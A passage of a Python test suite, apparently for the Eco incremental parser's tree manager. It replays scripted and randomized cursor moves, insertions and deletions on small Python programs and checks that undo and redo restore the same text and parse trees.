self.move(RIGHT, 13)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 10)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 7)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 9)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 2)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 8)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 3)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 5)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 6)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 2)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 1)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 7)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 5)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 3)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 4)
self.treemanager.key_delete()
def test_undo_random_deletion_bug3_short(self):
self.reset()
program = """class Connect4():
pass
def __init__():
pass
for x in y:
pass
for x in y:
pass
pass
pass
pass
def _end():
if winner_colour:
pass
pass"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 16)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 15)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
def test_random_undo_deletion_bug4(self):
# Occured during implementing retain changes
self.reset()
connect4 = """class X:
def __init__():
if x:
for rowno in ROWS:
a
b
c
d
e"""
self.treemanager.import_file(connect4)
self.treemanager.cursor_reset()
self.move(DOWN, 6)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 7)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
def test_undo_random_deletion_bug5(self):
self.reset()
connect4 = """class Connect4:
def __init__(self):
pass1X
def _update_from_pos_one_colour():
pass2
def _turn(self):
while True:
pass3X
def _end():
for i in buttons:
pass4
if winner_colour:
pass5"""
self.treemanager.import_file(connect4)
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 7)
self.move(RIGHT, 19)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 7)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_end()
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 7)
self.move(RIGHT, 6)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 15)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 0)
self.treemanager.key_delete()
def test_undo_random_deletion_bug6(self):
self.reset()
self.treemanager.import_file("""class X:
def helloworld():
for x in y:
if x:
pass1
else:
pass2
pass3
def foo(x):
pass4""")
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 1)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 1)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 6)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 5)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 9)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 2)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 5)
self.treemanager.key_delete()
def test_undo_random_deletion_bug7(self):
self.reset()
self.treemanager.import_file("""class Connect4():
def _update_from_pos_one_colour():
self.cols[x][y]["background"] = colour""")
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 19)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 18)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 17)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
def test_undo_random_deletion_bug8(self):
# This is a test for a bug in the out-of-context analysis, where the
# boundaries of the subtree being parsed were not strictly defined,
# causing the parser to reduce and reuse nodes outside of the original
# subtree. After the analysis failed, those reused subtrees would then
# not be reverted causing errors with subtrees that have become detached
# from the main parse tree.
# This was solved by cutting off the subtree's root from its parent during
# out-of-context analysis and reattaching is after analysis is done.
self.reset()
self.treemanager.import_file("""class Connect4():
def f1():
a
b
for c in d:
e
f
g
h
for i in j:
k
def f2():
while True:
l
if m:
n
def f3():
for o in p:
q
if r:
s
t("%s wins" % winner_colour)""")
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 25)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_end()
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 24)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 14)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 24)
self.move(RIGHT, 14)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 24)
self.move(RIGHT, 26)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 24)
self.move(RIGHT, 16)
self.treemanager.key_delete()
def test_undo_random_deletion_bug9(self):
self.reset()
self.treemanager.import_file("""class Connect4():
UI_DEPTH = 5
def __init__():
self.top = tk.Tk()
self.pl_engine = uni.Engine()""")
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 8)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 15)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 13)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 12)
self.treemanager.key_delete()
self.treemanager.key_delete()
def get_random_key(self):
import random
keys = list("abcdefghijklmnopqrstuvwxyz0123456789 \r:,.[]{}()!$%^&*()_+=")
return random.choice(keys)
@slow
def test_undo_random_insertion(self):
import random
self.reset()
self.treemanager.import_file(programs.connect4)
assert self.parser.last_status == True
self.text_compare(programs.connect4)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(20))
random.shuffle(cols)
for col in cols:
print("self.treemanager.cursor_reset()")
print("self.move(DOWN, %s)" % linenr)
print("self.move(RIGHT, %s)" % col)
self.treemanager.cursor_reset()
self.move(DOWN, linenr)
self.move(RIGHT, col)
k = self.get_random_key()
print("self.treemanager.key_normal(%s)" % repr(k))
x = self.treemanager.key_normal(k)
if x == "eos":
continue
print("self.treemanager.undo_snapshot()")
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.connect4)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.connect4)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(programs.connect4)
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_undo_random_insertion_fast(self):
import random
self.reset()
self.treemanager.import_file(programs.pythonsmall)
assert self.parser.last_status == True
self.text_compare(programs.pythonsmall)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(10))
random.shuffle(cols)
for col in cols:
print("self.treemanager.cursor_reset()")
self.treemanager.cursor_reset()
print("self.move(DOWN, %s)" % linenr)
print("self.move(RIGHT, %s)" % col)
self.move(DOWN, linenr)
self.move(RIGHT, col)
k = self.get_random_key()
print("self.treemanager.key_normal('%s')" % repr(k))
x = self.treemanager.key_normal(k)
if x == "eos":
continue
print("self.treemanager.undo_snapshot()")
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.pythonsmall)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.pythonsmall)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(programs.pythonsmall)
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_undo_random_insertion_fast_bug1(self):
self.reset()
self.treemanager.import_file(programs.pythonsmall)
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 8)
self.treemanager.key_normal('5')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 3)
self.treemanager.key_normal('p')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 8)
self.treemanager.key_normal('\r')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 4)
self.treemanager.key_normal('\r')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 7)
self.treemanager.key_normal('.')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 0)
self.treemanager.key_normal('9')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 0)
self.treemanager.key_normal('1')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 13)
self.move(RIGHT, 0)
self.treemanager.key_normal('6')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 6)
self.treemanager.key_normal('$')
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 1)
self.treemanager.key_normal('j')
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 0)
self.treemanager.key_normal('o')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 6)
self.move(RIGHT, 3)
self.treemanager.key_normal('2')
self.treemanager.undo_snapshot()
for i in range(20):
self.treemanager.key_ctrl_z()
def test_undo_random_insertion_retain_bug(self):
self.reset()
self.treemanager.import_file("""class Connect4():
UI_DEPTH = 5""")
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 14)
self.treemanager.key_normal('b')
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 2)
self.treemanager.key_normal('w')
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 5)
self.treemanager.key_normal('^')
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 8)
self.treemanager.key_normal('!')
def test_undo_random_newlines(self):
import random
self.reset()
p = """class X:
def helloworld(x, y, z):
for x in range(0, 10):
if x == 1:
return 1
else:
return 12
return 13
def foo(x):
x = 1
y = 2
foo()
return 12"""
self.treemanager.import_file(p)
assert self.parser.last_status == True
self.text_compare(p)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines[:2]:
cols = list(range(20))
random.shuffle(cols)
for col in cols[:1]: # add one newline per line
self.treemanager.cursor_reset()
print("self.move(DOWN, %s)" % linenr)
print("self.move(RIGHT, %s)" % col)
print("self.treemanager.key_normal(\"\r\")")
self.move(DOWN, linenr)
self.move(RIGHT, col)
x = self.treemanager.key_normal("\r")
if x == "eos":
continue
self.treemanager.undo_snapshot()
print("self.treemanager.undo_snapshot()")
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(p)
self.text_compare(t1.export_as_text())
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_bug_insert_newline_2(self):
import random
self.reset()
p = """class X:
def helloworld():
for x in y:
if x:
return 1
else:
return 12
return 13"""
self.treemanager.import_file(p)
assert self.parser.last_status == True
self.text_compare(p)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 1)
self.treemanager.key_normal("\r")
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 6)
self.move(RIGHT, 1)
self.treemanager.key_normal("\r")
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(p)
self.text_compare(t1.export_as_text())
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_bug_insert_newlines_3(self):
import random
self.reset()
p = """class X:
def helloworld():
for x in range(0, 10):
if x == 1:
return 1
else:
return 12
return 13"""
self.treemanager.import_file(p)
assert self.parser.last_status == True
self.move(DOWN, 1)
self.move(RIGHT, 3)
self.treemanager.key_normal("\r")
self.treemanager.undo_snapshot()
self.move(DOWN, 5)
self.move(RIGHT, 7)
self.treemanager.key_normal("\r")
def test_bug_delete(self):
import random
self.reset()
p = """class X:
def helloworld():
for x in y:
if x:
return 1
else:
return 12
return 13"""
self.treemanager.import_file(p)
assert self.parser.last_status == True
self.text_compare(p)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 6)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 7)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 10)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(p)
self.text_compare(t1.export_as_text())
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_bug_insert_newline(self):
self.reset()
p = """class X:
def helloworld(x, y, z):
for x in range(0, 10):
if x == 1:
return 1
else:
return 12
return 13
def foo(x):
x = 1
y = 2
foo()
return 12"""
self.treemanager.import_file(p)
assert self.parser.last_status == True
self.text_compare(p)
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 7)
self.move(RIGHT, 10)
self.treemanager.key_normal("\r")
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 6)
self.move(RIGHT, 0)
self.treemanager.key_normal("\r") # this has to be \r not \n (Eco works with \r)
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(p)
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
@slow
def test_undo_random_insertdelete(self):
import random
self.reset()
print("self.reset()")
#self.save()
print("self.treemanager.import_file(programs.connect4)")
self.treemanager.import_file(programs.connect4)
assert self.parser.last_status == True
#self.save()
self.text_compare(programs.connect4)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(20))
random.shuffle(cols)
for col in cols:
print("self.treemanager.cursor_reset()")
print("self.move(%s, %s)" % (DOWN, linenr))
print("self.move(%s, %s)" % (RIGHT, col))
self.treemanager.cursor_reset()
self.move(DOWN, linenr)
self.move(RIGHT, col)
k = self.get_random_key()
if k in ["a", "c", "e", "g", "i", "k", "m", "1", "3", "5", "7"]:
# for a few characters DELETE instead of INSERT
print("self.treemanager.key_delete()")
x = self.treemanager.key_delete()
else:
rk = self.get_random_key()
print("self.treemanager.key_normal(%s)" % rk)
x = self.treemanager.key_normal(rk)
if x == "eos":
continue
print("self.treemanager.undo_snapshot()")
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.connect4)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.connect4)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(programs.connect4)
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
@slow
def test_undo_random_insertdeleteundo_slow(self):
self.random_insert_delete_undo(programs.connect4)
@slow
def test_undo_random_insertdeleteundo(self):
self.random_insert_delete_undo(programs.pythonsmall)
def test_undo_random_insertdeleteundo_bug1(self):
self.reset()
program = """class Connect4():
UI_DEPTH = 5
def __init__():
pass"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
self.text_compare(program)
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 0)
self.treemanager.key_normal(',')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 3)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 4)
self.treemanager.key_normal(' ')
self.treemanager.undo_snapshot()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
def test_undo_random_insertdeleteundo_bug2(self):
self.reset()
prog = """class X:
def hello():
pass
def foo():
do
something
here"""
self.treemanager.import_file(prog)
assert self.parser.last_status == True
self.text_compare(prog)
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 0)
self.treemanager.key_normal(' ')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 3)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.key_ctrl_z()
self.treemanager.cursor_reset()
self.move(DOWN, 6)
self.move(RIGHT, 11)
self.treemanager.key_normal('x')
self.treemanager.undo_snapshot()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.text_compare(prog)
def test_undo_random_insertdeleteundo_bug3(self):
self.reset()
self.treemanager.import_file("""class C:
x = 5
""")
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 1)
self.treemanager.key_normal('\r')
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 0)
self.treemanager.key_normal('\r')
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 2)
self.treemanager.key_delete()
assert self.parser.last_status == False
def test_undo_random_insertdeleteundo_bug4(self):
self.reset()
program = """class X:
def helloworld():
for x in y:
if x:
return 1"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 1)
self.treemanager.key_normal('c')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 0)
self.treemanager.key_normal('(')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 2)
self.treemanager.key_normal('b')
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# bug causes the 'b' to be ignored by undo
assert self.treemanager.cursor.node.symbol.name == "bc"
self.treemanager.key_ctrl_z()
assert self.treemanager.cursor.node.next_term.next_term.symbol.name == "c"
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
def test_undo_random_insertdeleteundo_bug5(self):
self.reset()
program = """class X:
def x():
pass
def y():
pass2"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 0)
self.treemanager.key_normal('&')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 0)
self.treemanager.key_normal('!')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 0)
self.treemanager.key_normal('^')
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
def test_undo_random_insertdeleteundo_bug6(self):
self.reset()
program = """class X:
def x():
pass
def y():
pass2"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 4)
self.treemanager.key_normal('$')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 2)
self.treemanager.key_normal('a')
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 1)
self.treemanager.key_normal('0')
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 2)
self.treemanager.key_normal('2')
def test_undo_random_insertdeleteundo_bug7_retain(self):
self.reset()
prog = """def __init__():
pass1
# controls cpu/human players
pass2"""
self.treemanager.import_file(prog)
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 1)
self.treemanager.key_normal('m')
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 2)
self.treemanager.key_normal('f')
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 1)
self.treemanager.key_normal('=')
def test_undo_random_insertdeleteundo_bug8(self):
self.reset()
self.treemanager.import_file("""class Connect4():
UI_DEPTH = 5
def __init__():
self.top = tk.Tk()
self.top.title()
self.turn = None
self.ai_players = 1
pass""")
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 18)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 6)
self.treemanager.key_normal('4')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 11)
self.treemanager.key_normal(')')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 13)
self.treemanager.key_normal('n')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 2)
self.treemanager.key_normal('9')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 2)
self.treemanager.key_normal('&')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 3)
self.treemanager.key_normal('+')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 14)
self.treemanager.key_normal('5')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 0)
self.treemanager.key_normal(',')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 0)
self.treemanager.key_normal('1')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 7)
self.treemanager.key_normal('c')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 9)
self.treemanager.key_normal('(')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 15)
